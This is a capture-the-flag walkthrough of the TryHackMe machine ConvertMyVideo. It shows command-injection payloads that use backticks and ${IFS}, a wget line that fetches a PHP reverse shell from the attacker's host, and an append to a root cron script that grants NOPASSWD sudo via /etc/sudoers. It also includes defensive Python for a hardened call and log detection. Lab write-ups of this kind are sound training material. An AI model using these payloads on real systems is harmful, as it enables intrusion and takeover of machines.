ConvertMyVideo from TryHackMe

by Johann Van Niekerk


Nmap Scan

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

ConvertMyVideo is a TryHackMe machine that is rated medium. It has an interesting take on command injection, as well as a good demonstration of another way to get spaces into a command when literal spaces are dropped and would otherwise break your payload. The privilege escalation is great for the patient hacker :).

Initial Access - Command Injection

Our initial enumeration begins with the web application on port 80. When we browse to it, we are met with the following page.

(screenshot: the conversion page)

We load up Burp Suite and check what happens when we interact with the conversion form and press the button. Submitting sends a POST request carrying what we typed, which the web server then handles. Knowing this, we start testing whether we can complete the request and have additional commands executed after it.

(screenshot: injected commands in the request)

In this case, we are using the Linux shell's command substitution: wrapping our command in backticks (not quotation marks) makes the shell run that command first and substitute its output into the surrounding command line, so the command within the backticks takes precedence. When we send it, nothing visibly changes on the site, but when we check the response in Burp Suite we discover the following:

(screenshot: command output in the response)

Testing further, we have command execution with ls, id, whoami and so on, but the application won't process anything containing a space. I also tried URL-encoding the space as %20 and it still does not work. After some searching we find another way to get a space into a Linux command: the shell variable ${IFS} (the internal field separator), which expands to whitespace when the shell evaluates the command.

We adjust our payload with the following and then see what we have here:

test;`ping${IFS}-c1${IFS}10.4.42.21`
(screenshot: ping works)

Now that we know this, we have confirmed remote code execution and can go further: attempt to get a reverse shell and, with it, our initial access to the machine.
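As an added illustration, not the machine's own code: a constructed converter that drops spaces before handing the value to /bin/sh, the ${IFS} payload that still gets through, the same call made without a shell so the value stays a literal argument, and a small check over constructed request-log lines for the markers this technique leaves (the parameter name "video" is an assumption).

```python
import re
import subprocess
from urllib.parse import unquote

# Constructed stand-in for the converter on the box (not its real code):
# a "sanitizer" that only drops spaces, as observed in the writeup, and a
# command line built around the user value and handed to /bin/sh.
def strip_spaces(value: str) -> str:
    return value.replace("%20", "").replace(" ", "")

def vulnerable_convert(name: str) -> str:
    cmd = "echo converting " + strip_spaces(name)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

def hardened_convert(name: str) -> str:
    # Same job with no shell: an argv list makes the value one literal
    # argument, so backticks and ${IFS} are never interpreted.
    argv = ["echo", "converting", name]
    return subprocess.run(argv, capture_output=True, text=True).stdout

# The writeup's trick: the filter runs before the shell does, and ${IFS}
# expands to whitespace only inside the shell, so the backtick command
# still becomes "printf %s INJECTED" and its output lands in the reply.
PAYLOAD = "test`printf${IFS}%s${IFS}INJECTED`"

# Defender side: backticks, $( and ${IFS} in a request body are rare in
# legitimate traffic and cheap to flag.
MARKERS = re.compile(r"`|\$\(|\$\{IFS\}")

def flag_requests(log_lines):
    """Return the URL-decoded lines that carry substitution/IFS markers."""
    return [unquote(line) for line in log_lines if MARKERS.search(unquote(line))]

# Constructed request log; the parameter name "video" is an assumption.
SAMPLE_LOG = [
    "POST /convert video=test%3B%60ping%24%7BIFS%7D-c1%24%7BIFS%7D10.4.42.21%60",
    "POST /convert video=my%20holiday%20video",
    "POST /convert video=test%3B%60wget%24%7BIFS%7Dhttp%3A%2F%2F10.10.26.248%2Fgood.php%60",
]

if __name__ == "__main__":
    print(vulnerable_convert(PAYLOAD), end="")  # converting testINJECTED
    print(hardened_convert(PAYLOAD), end="")    # the payload echoed back literally
    for hit in flag_requests(SAMPLE_LOG):
        print("flagged:", hit)
```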

We grab a reverse shell; in this case I used Ivan Šincek's version of the pentestmonkey PHP reverse shell. I hosted the file and sent the following to fetch it onto the target.

# Upload Malicious File
test;`wget${IFS}http://10.10.26.248/good.php`

# Browse to:
http://10.10.26.248/good.php
(screenshot: shell)

Visiting the page then executed the payload, giving us our initial access and a foothold on the system as www-data.

Privilege Escalation - Root Cronjob

After the general checks, we run a few enumeration scripts and still cannot see anything. Our next step is to see if we can find any cron jobs that aren't visible to us, using a tool such as pspy.

Cron jobs in root's crontab are not visible to low-privilege users, so the only way to see that activity is to run a tool that monitors the system continuously and reports any process activity. That is what pspy does.

# Transfer over
wget 10.4.42.21/pspy64
chmod +x pspy64

# Run PsPy
./pspy64

After a few minutes of monitoring, the following pops up and shows an interesting execution:

(screenshot: pspy output)

This runs as UID=0 (root) and executes a script kept at /www/html/tmp/clean.sh, which runs only a single command, periodically.

(screenshot: clean.sh)

Knowing this, we have a choice of payloads, since bash will run anything we append to the script: reverse shells, a root-owned bash executable, adding new users and so forth.

We decided to add www-data to the sudoers file instead.

echo "echo '$(whoami) ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers" >> /var/www/html/tmp/clean.sh
(screenshot: sudoers)

Then we run pspy again and wait for the next execution. Once we see the activity, we can run the following and jump straight into root:

sudo su
(screenshot: root)

With that, we are root and have fully compromised the system.